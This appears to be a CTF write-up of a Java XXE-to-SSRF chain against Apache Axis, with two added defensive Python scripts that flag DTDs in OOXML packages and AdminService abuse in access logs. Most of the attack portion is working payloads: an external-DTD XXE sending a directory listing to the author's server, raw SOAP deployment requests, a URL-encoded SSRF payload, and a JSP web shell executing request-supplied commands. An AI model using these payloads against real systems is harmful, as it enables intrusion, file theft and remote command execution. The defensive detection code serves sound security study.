The challenge hint says it is a Java XXE. Testing showed that the XXE injection point is the [Content_Types].xml part inside the xlsx.
First, use the XXE to read a directory listing.
The payload goes into the Excel file:
<!DOCTYPE ANY[ <!ENTITY % send SYSTEM 'http://www.liugongrui.com/ctf/xxe/test.dtd'> %send; %test; %back; ]>
test.dtd is hosted on my own server:
<!ENTITY % file SYSTEM "netdoc:../webapps/ctffffff/backups/">
<!ENTITY % test "<!ENTITY % back SYSTEM 'http://xxxx.xxxx.xxx:8000/?file=%file;'>">
Then listen on the server: the filenames in that directory come back in the request, download them, and it turns out to be an Axis service.
The Axis service vulnerability is covered in this article:
http://www.lmxspace.com/2019/07/20/Axis-Rce%E5%88%86%E6%9E%90/
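As an added, defender-side example (not part of the original writeup): a Python check that opens an OOXML package as the zip archive it is and flags any XML part carrying a DOCTYPE or ENTITY declaration. Legitimate xlsx/docx/pptx parts never need a DTD, so this is a cheap pre-filter before the file reaches the real XML parser; the parser itself should additionally have DOCTYPE declarations disabled so the same input is rejected even if the pre-filter is bypassed. The two packages scanned are constructed inside the script, and the DTD host in the malicious one is a placeholder.

```python
import io
import re
import zipfile

# OOXML packages (xlsx/docx/pptx) are zip archives whose XML parts never need
# a DTD, so a DOCTYPE or ENTITY declaration in any part is a reliable signal
# of an XXE attempt. Check this before the file reaches a full XML parser.
DTD_MARKER = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)
EXTERNAL_ID = re.compile(rb"\b(SYSTEM|PUBLIC)\b")


def scan_ooxml_for_dtd(package: bytes) -> list[dict]:
    """Return one finding per XML/rels part that declares a DTD or entity."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for info in zf.infolist():
            name = info.filename
            if not name.endswith((".xml", ".rels")):
                continue
            content = zf.read(name)
            match = DTD_MARKER.search(content)
            if match:
                findings.append({
                    "part": name,
                    "marker": match.group(1).decode("ascii").upper(),
                    # SYSTEM/PUBLIC identifiers mean the DTD reaches outside the file
                    "external": bool(EXTERNAL_ID.search(content)),
                })
    return findings


def build_package(content_types_xml: bytes) -> bytes:
    """Build a minimal xlsx-like zip around a given [Content_Types].xml (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types_xml)
        zf.writestr("_rels/.rels", b'<?xml version="1.0"?>'
                    b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>')
        zf.writestr("xl/workbook.xml", b'<?xml version="1.0"?><workbook/>')
    return buf.getvalue()


# Constructed benign package: a normal [Content_Types].xml with no DTD.
BENIGN_XLSX = build_package(
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    b'<Default Extension="xml" ContentType="application/xml"/></Types>'
)

# Constructed malicious package: same shape as the writeup's [Content_Types].xml
# payload; the DTD host name is a placeholder.
MALICIOUS_XLSX = build_package(
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b"<!DOCTYPE ANY [ <!ENTITY % send SYSTEM 'http://dtd-host.example/test.dtd'> %send; ]>\n"
    b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>'
)

if __name__ == "__main__":
    for label, pkg in (("benign", BENIGN_XLSX), ("malicious", MALICIOUS_XLSX)):
        print(label, scan_ooxml_for_dtd(pkg) or "clean")
```

Running the script reports the benign package as clean and the malicious one with a DOCTYPE finding on [Content_Types].xml marked as external. The scan looks at `.rels` parts as well as `.xml` because every part of the package is parsed by the consuming library, not only the one the writeup abused.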
The Axis payload:
Step 1: create a RandomService
POST /axis_war/services/AdminService?wsdl HTTP/1.0
Content-Type: text/xml; charset=utf-8
Accept: application/soap+xml, application/dime, multipart/related, text/*
User-Agent: Axis/1.4
Host: localhost:8080
Cache-Control: no-cache
Pragma: no-cache
SOAPAction: ""
Content-Length: 1061

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:api="http://127.0.0.1/Integrics/Enswitch/API" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <ns1:deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java" xmlns:ns1="http://xml.apache.org/axis/wsdd/">
      <ns1:service name="RandomService" provider="java:RPC">
        <requestFlow>
          <handler type="RandomLog"/>
        </requestFlow>
        <ns1:parameter name="className" value="java.util.Random"/>
        <ns1:parameter name="allowedMethods" value="*"/>
      </ns1:service>
      <handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler">
        <parameter name="LogHandler.fileName" value="../webapps/ROOT/shell.jsp"/>
        <parameter name="LogHandler.writeToConsole" value="false"/>
      </handler>
    </ns1:deployment>
  </soapenv:Body>
</soapenv:Envelope>
Step 2: write the shell file
POST /axis_war/services/RandomService HTTP/1.0
Content-Type: text/xml; charset=utf-8
Accept: application/soap+xml, application/dime, multipart/related, text/*
User-Agent: Axis/1.4
Host: localhost:8080
Cache-Control: no-cache
Pragma: no-cache
SOAPAction: ""
Content-Length: 874

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:api="http://127.0.0.1/Integrics/Enswitch/API" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <api:main soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <api:in0><![CDATA[
<%@page import="java.util.*,java.io.*"%><%
if (request.getParameter("c") != null) {
  Process p = Runtime.getRuntime().exec(request.getParameter("c"));
  DataInputStream dis = new DataInputStream(p.getInputStream());
  String disr = dis.readLine();
  while ( disr != null ) {
    out.println(disr);
    disr = dis.readLine();
  };
  p.destroy();
}%>
]]></api:in0>
    </api:main>
  </soapenv:Body>
</soapenv:Envelope>
The payload above needs to reach AdminService, which only works when the call comes from inside the network (the server itself), so we use the XXE to make the request as an SSRF. Because XXE can only issue GET requests, the POST has to be converted into a GET; the conversion method is described at https://www.freebuf.com/vuls/135318.html
The converted payload is:
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://127.0.0.1:8080/axis/services/AdminService?method=!--%3E%3Cns1%3Adeployment+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cns1%3Aservice+name%3D%22RandomService%22+provider%3D%22java%3ARPC%22%3E+%3CrequestFlow%3E+%3Chandler+type%3D%22RandomLog%22%2F%3E+%3C%2FrequestFlow%3E+%3Cns1%3Aparameter+name%3D%22className%22+value%3D%22java.util.Random%22%2F%3E+%3Cns1%3Aparameter+name%3D%22allowedMethods%22+value%3D%22*%22%2F%3E+%3C%2Fns1%3Aservice%3E+%3Chandler+name%3D%22RandomLog%22+type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22%3E+%3Cparameter+name%3D%22LogHandler.fileName%22+value%3D%22..%2Fwebapps%2Faxis%2Fshell.jsp%22%2F%3E+%3Cparameter+name%3D%22LogHandler.writeToConsole%22+value%3D%22false%22%2F%3E+%3C%2Fhandler%3E+%3C%2Fns1%3Adeployment"> ]> <x>&xxe;</x>
Put it into the Excel file; once the upload succeeds, visit http://39.98.64.24:25531/axis/services/RandomService
The following is displayed, which shows the service has been created successfully.
Then use Burp Suite to send the POST request to http://39.98.64.24:25531/axis/services/RandomService to write the file contents.
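As an added, detection-side example (not from the writeup): Python that scans web-server access-log lines for the traffic this step leaves behind, a request to Axis's AdminService whose `method` query parameter carries a WSDD deployment descriptor and a LogHandler.fileName parameter. The log lines are constructed for the example and follow the common Apache/Tomcat access-log layout; the first line mirrors the GET-converted deployment shown above, shortened.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Common access-log layout (Apache/Tomcat): client, ident, user, [time], "request", status
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def analyse_request(method: str, target: str) -> list[str]:
    """Reasons this request looks like Axis AdminService abuse; empty list if none."""
    parts = urlsplit(target)
    reasons = []
    if not parts.path.endswith("/services/AdminService"):
        return reasons
    reasons.append("request to Axis AdminService")
    # parse_qs percent-decodes values and turns '+' into spaces, so a WSDD
    # descriptor smuggled through the query string shows up in clear text.
    query = parse_qs(parts.query, keep_blank_values=True)
    decoded = " ".join(v for values in query.values() for v in values)
    if method.upper() == "GET" and "method" in query:
        reasons.append("SOAP method invoked through GET query string")
    if ":deployment" in decoded or "<deployment" in decoded:
        reasons.append("WSDD deployment descriptor in request")
    if "LogHandler.fileName" in decoded:
        reasons.append("LogHandler.fileName set (writes a file on the server)")
    return reasons


def scan_access_log(text: str) -> list[dict]:
    """Return one finding per log line that matches at least one AdminService rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        reasons = analyse_request(m["method"], m["target"])
        if reasons:
            findings.append({
                "client": m["client"],
                "status": int(m["status"]),
                "reasons": reasons,
                # A loopback client means the request originated on the server
                # itself (for instance via SSRF); with a deployment descriptor
                # attached it deserves an immediate look.
                "loopback": m["client"] in ("127.0.0.1", "::1"),
            })
    return findings


# Constructed sample log. Line 1 mirrors the writeup's GET-based deployment
# (shortened); the others are ordinary traffic plus one direct AdminService POST.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Oct/2020:13:55:36 +0000] "GET /axis/services/AdminService?method=!--%3E%3Cns1%3Adeployment+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%3Chandler+name%3D%22RandomLog%22+type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22%3E%3Cparameter+name%3D%22LogHandler.fileName%22+value%3D%22..%2Fwebapps%2Faxis%2Fshell.jsp%22%2F%3E%3C%2Fhandler%3E%3C%2Fns1%3Adeployment HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2020:13:56:01 +0000] "GET /axis/services/RandomService HTTP/1.1" 200 143
10.0.0.5 - - [10/Oct/2020:13:56:20 +0000] "GET /axis/services/Version?method=getVersion HTTP/1.1" 200 300
10.0.0.7 - - [10/Oct/2020:13:57:00 +0000] "POST /axis/services/AdminService HTTP/1.1" 403 0
"""

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

Only the two AdminService lines produce findings: the loopback GET carries all four reasons, the external POST only the base "request to AdminService" reason. Any hit on AdminService from a client that is not a known administrator is worth alerting on, and a loopback source on such a request points at the application making the call on an attacker's behalf, which is exactly the XXE-to-SSRF chain this writeup uses.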
Visit the shell's URL.
Commands can now be executed.
flag